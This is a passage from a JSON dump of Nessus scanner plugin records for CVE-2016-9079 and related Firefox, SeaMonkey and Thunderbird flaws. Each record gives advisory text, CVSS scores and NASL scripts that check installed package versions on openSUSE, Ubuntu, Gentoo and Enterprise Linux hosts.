reference:\"firefox-45.5.1-1.0.1.el5_11\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"firefox-45.5.1-1.0.1.el6_8\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"firefox-45.5.1-1.0.1.el7_3\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-17T15:20:11", "description": "Versions of Mozilla Firefox prior to 50.0.2 are unpatched for a use-after-free condition in 'dom/smil/nsSMILTimeContainer.cpp' that is triggered when handling SVG animations. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-01-05T00:00:00", "type": "nessus", "title": "Mozilla Firefox < 50.0.2 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "9850.PRM", "href": "https://www.tenable.com/plugins/nnm/9850", "sourceData": "Binary data 9850.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:06", "description": "MozillaFirefox is updated to version 50.0.2 which fixes the following issues :\n\n - Firefox crashed with 3rd party Chinese IME when using IME text (fixed in version 50.0.1)\n\n - Redirection from an HTTP connection to a data: URL could inherit wrong origin after an HTTP redirect (fixed in version 50.0.1, bmo#1317641, MFSA 2016-91, boo#1012807, CVE-2016-9078)\n\n - Maliciously crafted SVG animations could cause remote code execution (fixed in version 50.0.2, bmo#1321066, MFSA 2016-92, boo##1012964, CVE-2016-9079)", "cvss3": {}, "published": "2016-12-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaFirefox (openSUSE-2016-1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9078", "CVE-2016-9079"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2016-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/95552", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1392.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95552);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-9078\", \"CVE-2016-9079\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (openSUSE-2016-1392)\");\n script_summary(english:\"Check for the openSUSE-2016-1392 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MozillaFirefox is updated to version 50.0.2 which fixes the following\nissues :\n\n - Firefox crashed with 3rd party Chinese IME when using\n IME text (fixed in version 50.0.1)\n\n - Redirection from an HTTP connection to a data: URL could\n inherit wrong origin after an HTTP redirect (fixed in\n version 50.0.1, bmo#1317641, MFSA 2016-91, boo#1012807,\n CVE-2016-9078)\n\n - Maliciously crafted SVG animations could cause remote\n code execution (fixed in version 50.0.2, bmo#1321066,\n MFSA 2016-92, boo##1012964, CVE-2016-9079)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-branding-upstream-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-buildsymbols-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-debuginfo-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-debugsource-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-devel-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-translations-common-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-translations-other-50.0.2-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-branding-upstream-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-buildsymbols-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-debuginfo-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-debugsource-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-devel-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-common-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-other-50.0.2-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-branding-upstream-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-buildsymbols-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-debuginfo-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-debugsource-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-devel-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-translations-common-50.0.2-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"MozillaFirefox-translations-other-50.0.2-42.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:43", "description": "It was discovered that data: URLs can inherit the wrong origin after a HTTP redirect in some circumstances. An attacker could potentially exploit this to bypass same-origin restrictions. (CVE-2016-9078)\n\nA use-after-free was discovered in SVG animations. If a user were tricked in to opening a specially crafted website, an attacker could exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9079).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : firefox vulnerabilities (USN-3140-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9078", "CVE-2016-9079"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:firefox", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3140-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95425", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3140-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95425);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-9078\", \"CVE-2016-9079\");\n script_xref(name:\"USN\", value:\"3140-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : firefox vulnerabilities (USN-3140-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that data: URLs can inherit the wrong origin after a\nHTTP redirect in some circumstances. An attacker could potentially\nexploit this to bypass same-origin restrictions. (CVE-2016-9078)\n\nA use-after-free was discovered in SVG animations. If a user were\ntricked in to opening a specially crafted website, an attacker could\nexploit this to cause a denial of service via application crash, or\nexecute arbitrary code. (CVE-2016-9079).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3140-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"firefox\", pkgver:\"50.0.2+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"firefox\", pkgver:\"50.0.2+build1-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"firefox\", pkgver:\"50.0.2+build1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"firefox\", pkgver:\"50.0.2+build1-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:18:04", "description": "The remote host is affected by the vulnerability described in GLSA-201701-35 (Mozilla SeaMonkey: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla SeaMonkey.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-16T00:00:00", "type": "nessus", "title": "GLSA-201701-35 : Mozilla SeaMonkey: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1521", "CVE-2016-1522", "CVE-2016-1523", "CVE-2016-1526", "CVE-2016-9079"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:seamonkey", "p-cpe:/a:gentoo:linux:seamonkey-bin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201701-35.NASL", "href": "https://www.tenable.com/plugins/nessus/96515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-35.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96515);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1521\", \"CVE-2016-1522\", \"CVE-2016-1523\", \"CVE-2016-1526\", \"CVE-2016-9079\");\n script_xref(name:\"GLSA\", value:\"201701-35\");\n\n script_name(english:\"GLSA-201701-35 : Mozilla SeaMonkey: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-35\n(Mozilla SeaMonkey: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla SeaMonkey.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, or obtain\n sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-35\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Mozilla SeaMonkey users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-2.46-r1'\n All Mozilla SeaMonkey-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-bin-2.46'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 2.46-r1\"), vulnerable:make_list(\"lt 2.46-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey-bin\", unaffected:make_list(\"ge 2.46\"), vulnerable:make_list(\"lt 2.46\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla SeaMonkey\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:38:55", "description": "Christian Holler, Jon Coppeard, Olli Pettay, Ehsan Akhgari, Gary Kwong, Tooru Fujisawa, and Randell Jesup discovered multiple memory safety issues in Thunderbird. If a user were tricked in to opening a specially crafted message, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-5290)\n\nA same-origin policy bypass was discovered with local HTML files in some circumstances. An attacker could potentially exploit this to obtain sensitive information. (CVE-2016-5291)\n\nA heap buffer-overflow was discovered in Cairo when processing SVG content. If a user were tricked in to opening a specially crafted message, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code.\n(CVE-2016-5296)\n\nAn error was discovered in argument length checking in JavaScript. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code.\n(CVE-2016-5297)\n\nA buffer overflow was discovered in nsScriptLoadHandler. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code.\n(CVE-2016-9066)\n\nA use-after-free was discovered in SVG animations. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-9079).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : thunderbird vulnerabilities (USN-3141-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9079"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:thunderbird", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3141-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95426", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3141-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95426);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", 